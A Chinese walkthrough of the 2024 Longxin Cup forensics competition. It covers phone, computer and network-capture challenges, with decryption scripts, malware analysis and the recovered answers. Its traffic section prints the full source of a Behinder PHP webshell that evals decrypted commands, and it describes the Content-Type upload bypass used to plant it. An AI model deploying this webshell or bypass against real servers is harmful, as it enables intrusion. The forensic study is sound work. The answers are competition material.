网站建设最高管理权限,个人网站可以放广告吗,平台商城网站开发,适用于建设微型网站大佬文章#xff1a;
龙信杯复现#xff08;23、24#xff09; | BthclsBlog
手机部分
资料#xff1a;2024年第二届龙信杯 WP_2024龙信杯wp-CSDN博客
1.分析手机检材#xff0c;请问此手机共通过adb连接过几个设备#xff1f;[标准格式#xff1a;3] 2 /data/a…大佬文章
龙信杯复现23、24 | BthclsBlog
手机部分
资料2024年第二届龙信杯 WP_2024龙信杯wp-CSDN博客
1.分析手机检材请问此手机共通过adb连接过几个设备[标准格式3] 2 /data/adb/magisk.db其实是magisk APP的数据库而policies表是APP用来根据包名用户id决定策略的。 Magisk的policies表位于/data/adb/magisk.db数据库中主要用于存储Magisk模块的配置信息。 Android 设备在通过 ADB 连接时通常会要求用户授权连接会要求用户确认设备授权并将该设备的公钥保存在 adb_keys 文件中。该文件保存在/data/misc/adb/adb_keys。 如果要查看ADB的相关配置可以在/misc/adb/中找到在此文件夹中包含adb_temp_keys.xml其中存储了ADB 密钥那么受害人手机上包含了2条密钥因此连接过2台设备 2.分析手机检材机主参加考试的时间是什么时候[标准格式2024-06-17] 2024-08-23
在便签中可以直接找到8月12日说下周五考试下周五是8月23日 3.分析手机检材请问手机的蓝牙Mac地址是多少[标准格式12:12:12:12:12:12] 48:87:59:76:21:0f
蓝牙Mac地址存在于misc_1/bluedroid/bt_config.conf中
4. 分析手机检材请问压缩包加密软件共加密过几份文件[标准格式3] 6
这道题如果用的火眼记得分析耗时任务中的特征分析 在搜索记录中能够发现filecompress知道其包名为com.zs.filecompress全局搜索后在media_425/0/FileCompress下发现压缩包名字.txt实际是压缩包 5.分析手机检材请问机主的另外一个155的手机号码是多少[标准格式15555000555]
15599555555
在/app/~~_jzJxEiovvVW2OdDRNs_dw/com.zs.filecompress-rGjcoW-RV_xJmIwAD522NA下找到apk文件
上面导出apk文件后查看该apk文件的manifest找到入口为MainActivity找到压缩密码为1!8Da9Re5it2b3a.
这里使用到雷电手机取证工具 对第四题的6个压缩包解密即可在mm.txt中找到另一个电话 6.分析手机检材其手机存在一个加密容器请问其容器密码是多少。标准格式abc123
d7Avsd!Y]u}J8i(1bnDD-o 接上一个题可得 7.分析手机检材接上问其容器中存在一份成员名单嫌疑人曾经误触导致表格中的一个成员姓名被错误修改请确认这个成员的原始正确姓名[标准格式张三]
既然上题知道了容器密码那么现在去找容器在
受害人手机检材.tar/media_425/0/Download/data 中发现容器但是并不是简单的vc容器挂载而是tc加密
资料
【常见加密容器的取证方法】 使用tc进行挂载发现成功 使用大佬脚本
import pandas as pd
file_path 名单数据.xlsx
df pd.read_excel(file_path)
phone_to_name {}for name, phone, inviter, inviter_phone in zip(df[姓名], df[手机号], df[邀请人], df[邀请人手机号]):if phone not in phone_to_name:phone_to_name[phone] nameelif phone_to_name[phone] ! name:print(f警告手机号 {phone} 对应了多个不同的姓名{phone_to_name[phone]} 和 {name})if inviter_phone not in phone_to_name:phone_to_name[inviter_phone] inviterelif phone_to_name[inviter_phone] ! inviter:print(f警告手机号 {inviter_phone} 对应了多个不同的邀请人{phone_to_name[inviter_phone]} 和 {inviter})
#警告手机号 15979503550 对应了多个不同的姓名陆陆 和 陆俊梅8.分析手机检材接上题请确认该成员的对应的最高代理人是谁不考虑总部[标准格式张三]
刘珏兰
手动筛选xlsx表格可以得出上级关系是陆俊梅--肖玉莲--刘珏兰--总部 9.分析手机检材请确认在该组织中最高层级的层次是多少从总部开始算第一级[标准格式10] 12 10.分析手机检材请问第二层级从总部开始算第一级人员最多的人是多少人[标准格式100] 11.分析手机检材机主共开启了几款APP应用分身[标准格式3] 2 12.分析手机检材请问机主现在安装了几款即时通讯软件微博除外[标准格式1] 2 13.分析手机检材请问勒索机主的账号是多少非微信ID[标准格式AB123CD45]
1836042664454131712 14.分析手机检材接上问请问机主通过此应用共删除了多少条聊天记录 [标准格式2] 1 15.分析手机检材请问会盗取手机信息的APP应用包名是什么[标准格式com.lx.tt]
com.lxlxlx.luoliao
在微信聊天记录中能够发现盗取手机信息的APP 使用雷电打开
16. 接上题请问该软件作者预留的座机号码是多少[标准格式40088855555]
40085222666
发现可疑的编码 继续跟进发现存在AES解加密 既然是AES就要寻找key在可疑 的编码这里找到key key是E10ADC3949BA59ABBE56E057F20F883Eiv是其前16位即E10ADC3949BA59AB 将可疑的编码进行解密 17.接上题恶意程序偷取数据的收件邮箱地址的gmail邮箱是多少[标准格式lxgmail.com]
1304567895gmail.com
雷电直接分析出邮箱 可以解密得出 18.接上题恶意程序偷取数据的发件邮箱地址是多少[标准格式lxgmail.com]
temp1234gmail.com
smtp常用来发送邮件 进行解密 19.接上题恶意程序偷取数据的发件邮箱密码是多少[标准格式abc123] qwer123456 20.接上题恶意程序定义收发件的地址函数是什么[标准格式a] a
以下这段代码是一个用于配置和发送电子邮件的Java类的一部分它使用自定义的加密/解码方法和外部库来安全地处理敏感信息并通过SMTP协议发送邮件。 计算机部分
在火眼中可以发现电脑的用户信息登录密码注意这里的密码在重置时不要修改 在火眼中还发现存在加密文件 计算机取证用到了仿真软件 1.分析计算机检材嫌疑人在将其侵公数据出售前在Pycharm中进行了AES加密用于加密的key是多少[标准格式1A23456ABCD]
65B2564BG89F16G9 2.分析计算机检材身份证为371963195112051505这个人的手机号码是多少[标准格式13013524420]
15075547510
通过已知条件可知存在加密的文件使用ai生成解密脚本
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpaddef aes_decrypt(encrypted_data, key, iv):cipher AES.new(key, AES.MODE_CBC, iv)decrypted_data unpad(cipher.decrypt(encrypted_data), AES.block_size)return decrypted_data.decode()key b65B2564BG89F16G9
iv b83E6CBEF547944CFinput_file encrypted_data.txt
output_file decrypted_data.txtdef process_decrypted_data(input_file, output_file, key, iv):with open(input_file, r) as f_in, open(output_file, w) as f_out:for line in f_in:parts line.strip().split(,)index parts[0]f_out.write(index ,)decrypted_parts []for part in parts[1:]:encrypted_part bytes.fromhex(part)decrypted_part aes_decrypt(encrypted_part, key, iv)decrypted_parts.append(decrypted_part)f_out.write(,.join(decrypted_parts) \n)process_decrypted_data(input_file, output_file, key, iv)print(解密完成。) 解密完成之后找到对应的电话号码 3.分析计算机检材对解密后的身份证数据列进行单列去重操作重复的身份证号码数量是多少(身份证不甄别真假)[标准格式100] 0
使用脚本发现数量为0
# 打开文件并读取所有行
with open(decrypted_data.txt, r) as file:lines file.readlines()# 去除每行开头和结尾的空白字符
id_cards [line.strip() for line in lines]# 使用collections模块的Counter类来统计每个身份证号出现的次数
from collections import Counter
counter Counter(id_cards)# 计算重复的身份证号数量
duplicate_count sum(count for count in counter.values() if count 1)print(f身份证重复数量: {duplicate_count})身份证重复数量: 0
4.分析计算机检材接上题根据身份证号码第17位分析性别男性的数据是多少条[标准格式100]
工具使用方法Navicat Premium基本使用教程-CSDN博客 5001714 5.分析计算机检材接上题对解密后的数据文件进行分析甄别身份证号码性别值与标识性别不一致的数量是多少[标准格式100]
5001185 6.分析计算机检材计算机中存在的“VPN”工具版本是多少[标准格式1.1] 4.4
找软件WinXray 7.分析计算机检材计算机中存在的“VPN”节点订阅地址是什么[标准格式http://xxx.xx/x/xxx]
https://paste.ee/d/4eIzU 8.分析计算机检材eduwcry压缩包文件的解压密码是什么[标准格式abcabc] yasuomima
在下载中压缩包并发现密码管理器中的密码 9.分析计算机检材接上题请问恶意程序释放压缩包的md5值是多少。[标准格式全小写]
2024龙信杯wannacry勒索病毒题目分析_wannacry修改壁纸的函数-CSDN博客
10.分析计算机检材接上题请问恶意程序记录的洋葱浏览器下载地址是多少[标准格式http://xxx.xxx/xxx/xxx.zip]
注意这里需要关闭防火墙的相关软件软件
然后在c.wnry中找到了。 11.分析计算机检材接上题请问恶意程序解密了t.wnry后该dll的md5值是多少。[标准格式全小写]
12 分析计算机检材接上题恶意程序运行起来后第一个循环调用了几次taskkill.exe。[标准格式2] 13 分析计算机检材接上题请问WanaDecryptor.exe.lnk文件是通过什么函数创建的。[标准格式Aabcdef] 14 分析计算机检材接上题恶意程序修改系统桌面壁纸是在哪个函数实现的[标准格式sub_xxx]
15.分析计算机检材VeraCrypt加密容器的密码是什么[标准格式abc] 16.分析计算机检材其中存在一个苹果手机备份包手机备份包的密码是什么[标准格式12345]
75966
挂载data-backup成功之后即可得到一个苹果手机的备份包。 在浏览记录中发现用户搜索过如何解密5位数字密码的苹果备份 火眼中发现有密码 使用passware kit爆破密码 17. 分析计算机检材接上题机主实际篡改多少条微信数据[标准格式1] 3 18. 分析计算机检材接上题机主共存款了多少金额[标准格式10万]
在火眼的分析中发现SQLite文件里面的message有关键信息 19.分析计算机检材在手机模拟器中勒索apk软件的sha256值是什么[标准格式全小写]
340bd211955996c5d62bbde94a0bed4eb3a7965b23af52114991bca02346928e 20.分析计算机检材接上题请问勒索apk软件的解锁密码是什么[标准格式qwer.com]
anzhuo.com 流量分析
参考大佬文件
http://t.csdnimg.cn/l0jVH
1.分析流量包检材给出管理员对web环境进行管理的工具名。标准格式小皮宝塔
服务器IP为192.168.209.147。然后分析一下服务器的流量发现了DNS信息这边服务器主动请求了宝塔服务器。有其DNS解析记录所以管理工具应该就是宝塔面板。
2.分析流量包检材给出攻击者的ip地址是多少。标准格式127.0.0.1
使用http contains pwd筛选出所有HTTP请求或响应中包含字符串pwd的数据包,有效地监控和分析网络中的敏感操作确保网络安全,从里面可以看出攻击的ip地址 3.分析流量包检材给出攻击者爆破出的网站非管理员用户名是。标准格式admin
4.分析流量包检材攻击者进行目录扫描得到的具有后门的页面url路径为。标准格式/abc.html /up_load.html http.request.uri matches /*.html. 5.分析流量包检材攻击者通过修改请求包中的哪个字段导致恶意文件成功上传。标准格式test-typeContent-Type
看到这里失败了 过滤看一下有关流量,http.request.uri matches “/up_load.php”
这里是上传成功的 对比能够发现修改为Content-Type: image/jpeg能上传php和jpeg因此修改的字段就是Content-Type 6.分析流量包检材攻击者上传成功的恶意文件, 该文件的临时存放路径是。标准格式/abc/edf/tmp/php38mbeJ
webshell在/uploaded_img/cont.php 7.分析流量包检材服务器php配置文件的存放位置。 [标准格式/www/sev/php.ini]
/www/server/php/82/etc/php.ini 由木马内容可知AES128加密 追踪木马文件流尝试以后进行解密最后在第127个流追到了对应的命令。 以下是冰蝎马
冰蝎冰蝎3.0流量包简单分析_冰蝎3.0解密-CSDN博客
工具Webshell 流量在线解密
?php
error_reporting(0);
session_start();
//这行代码尝试将PHP的错误报告级别设置为0即关闭所有错误报告。符号是PHP中的错误控制运算符用于抑制错误消息的显示。然而这种做法在生产环境中通常不是最佳实践因为它可能隐藏了重要的问题。$keye45e329feb5d925b;$_SESSION[k]$key;session_write_close();
//这里定义了一个密钥$key并将其存储在会话变量$_SESSION[k]中。这可能是为了后续操作中使用这个密钥尽管在当前脚本中未直接使用会话中的密钥。session_write_close();写入会话数据并关闭会话文件。这通常用于在脚本中尽早关闭会话以便其他脚本或页面可以读取或写入会话数据。$postfile_get_contents(php://input);//使用file_get_contents(php://input)读取原始POST数据。这对于处理非表单编码的POST请求如JSON或XML特别有用。if(!extension_loaded(openssl)){$tbase64_.decode;$post$t($post.);for($i0;$istrlen($post);$i) {$post[$i] $post[$i]^$key[$i115]; }}else{$postopenssl_decrypt($post, AES128, $key);}
//接下来根据是否加载了openssl扩展以不同的方式解密POST数据如果未加载openssl扩展则使用简单的XOR加密与$key进行解密。注意这里使用了字符串的索引来访问字符并通过$i115确保索引在$key的长度范围内循环。如果加载了openssl扩展则使用AES-128算法解密POST数据。然而这里的实现存在一些问题AES解密需要密钥、初始化向量IV和适当的模式如CBC、ECB等但这里只提供了密钥没有提到IV和模式。$arrexplode(|,$post);$func$arr[0];$params$arr[1];class C{public function __invoke($p) {eval($p.);}}call_user_func(new C(),$params);
//解密后的数据被假设为函数名|参数的格式通过explode(|, $post)分割成数组。
定义一个匿名类C它实现了__invoke魔术方法。这意味着C的实例可以作为函数被调用实际上执行的是eval($p);其中$p是传递给__invoke方法的参数。
使用call_user_func(new C(), $params);动态调用C的实例并传入$params作为参数。
?
根据以上继续进行解密在20294流中得到对于的内容 接下来解密内容也在20294流中发现数据库的密码 解密20294流中另一个base64$pathL3d3dy93d3dyb290LzE5Mi4xNjguMjA5LjE0Nw得到以下内容 通过分析流量可知配置存储文件在流127之前通过筛选找到这个
/www/server/php/82/etc/php.ini
8.分析流量包检材被攻击的web环境其数据库密码是。 [标准格式qwer1234]
在上题中发现数据库的密码
X847Z3QzF1a6MHjR
9.分析流量包检材服务器管理存放临时登录密码的位置。 [标准格式/tmp/pass]
在29854流中发现相关信息/tmp/tmppass 10.分析流量包检材黑客获取的高权限主机的登录密码。 [标准格式qwer1234]
passwd!#
接上题在一样的流中发现 服务器部分
1. 分析服务器检材服务器会做登录密码验证该登录验证文件位置在[标准格式/xxx/xxx/xxx.xxx] 2.分析服务器检材服务器ssh端口是多少[标准格式1234]
